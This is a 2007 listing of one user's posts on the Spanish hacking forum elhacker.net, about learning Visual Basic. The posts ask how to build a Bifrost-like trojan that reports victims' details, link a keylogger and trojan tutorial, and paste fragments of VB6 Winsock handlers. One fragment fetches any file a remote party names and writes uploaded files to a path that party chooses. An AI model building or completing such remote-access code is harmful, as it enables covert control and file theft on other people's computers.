elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7]
61  Programación / Programación Visual Basic / alguien sabe? en: 25 Noviembre 2007, 23:13 pm
hola bueno lo mas probable es que ya halllan echo esta pregunta y si es asi de verdad disculpenme, e buscado en la parte de chinchetas y eng otras partes peroy no encuentro nada, bueno mi pregunta era como puedo hacer asi como el bifrost que cuando una persona se conecta a mi me da que si la ip, region donde vive, si usa modem, nombre de la computadora, version etc.. si alguien sabe o tiene un manual o el code porfavor postearlo aqui y disculpen mi ignorancia es que estoy aprendiendo VB y me a estado constando trabajo!  :-\
bueno sin mas nada que decir, disculpen las molestias y gracias!

Salu2's!
62  Programación / Programación Visual Basic / Tutorial de vb en: 24 Noviembre 2007, 21:41 pm
Hola bueno me encontre este tuhto de VB, es para gente que tenga algo de conocimiento de VB aqui te enseñan propiedades de commandhButton, etiquetas, etc tambien te enseñan a hacer Keylogger, un "Troyano" y muchas mas cosas venalo ustedes, tiene indice

http://rapidshare.com/files/72017456/Tuto_sobre_Visual_Basic.ZIP.html

Fue creado porh SkullMaster, a mi me gusto y esta bueno chekeenlo y bueno ya los tmoderadores eligan que hacer con el!
P.D: Disculpen los errores el teclado teien un problema! :-\

Salu2's!  ::)
63  Programación / Programación Visual Basic / Tengo una duda? en: 19 Noviembre 2007, 04:40 am
Bueno saludos e estado trabajando y estudiando, y depaso leyendo MUCHOS manuales de troyanos, joiners, etc.. pero SIEMPRE, SIEMPRE se me presenta un problema y es este!:

Código:
Private Sub ws_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Datos As String
Dim vDatos As Variant
 
ws(Index).GetData Datos
vDatos = Split(Datos, "|")
 
Select Case vDatos(0)
Case "hola" 'Nos saludan, luego lo añadiremos a la lista xDD
    Lv.ListItems.Add(, Index & "|", "Nuevo").SubItems(1) = ws(Index).RemoteHostIP
 
End Select
 
End Sub

Bueno el problema se me presenta aqui en:

Código:
Split

Siempre se presenta ya sea que segui un curso y puse eso y no me da error, es que de verdad ya estoy picado! :¬¬ porque es que siempre sale y me dice esto:

No se a decalraro Sub o Function a que se debe esto???????
Si alguien sabe de verdad que se lo agradeceria muchisimoo!!

Salu2's!
64  Programación / Programación Visual Basic / Disculpe que moleste de nuevo!:S en: 4 Noviembre 2007, 23:44 pm
Hola bueno como sabran estoy comenzando de nuevo a Estudiar VB y veo que no se varias cosas pero disculpen que los vuelva a molestar, pero necesito una ayuda en este codigo! :huh:

Código:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
Dim datos As String, dato As Variant
ws.GetData datos
If datos = "enviar" Then
ws.SendData filedata
End If
If datos = "recibido" Then
'ws.SendData "cierra"
End If
If Left(datos, 7) = "archivo" Then
send = True
    dato = Split(datos, "|")
    filesize = dato(1)
    path = dato(2)
    ws.SendData "enviar"
    datos2 = ""
Else
    If Len(datos2) <> filesize And send = True Then
        datos2 = datos2 + datos
    End If
        If Len(datos2) = filesize And send = True Then
        ws.SendData "recibido"
        Open path For Binary As #1
        Put #1, 1, datos2
        Close #1
        End If
End If
If Left(datos, 5) = "coger" Then
datos = Mid(datos, 6)
Open datos For Binary As #1
filedata = Input(LOF(1), 1)
Close #1
filesize = Len(filedata)
ws.SendData "archivo" & filesize
End If
End Sub

Bueno en la parte de:

Citar
    dato = Split(datos, "|")

Me dice que no tiene Function o Sub, osea la Variable que no declare la Variable!
Disculpen mi ESTUPIDA Ignorancia y pregunta, pero como lo soluciono no encuentro manera! :huh:

Salu2's!
Páginas: 1 2 3 4 5 6 [7]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines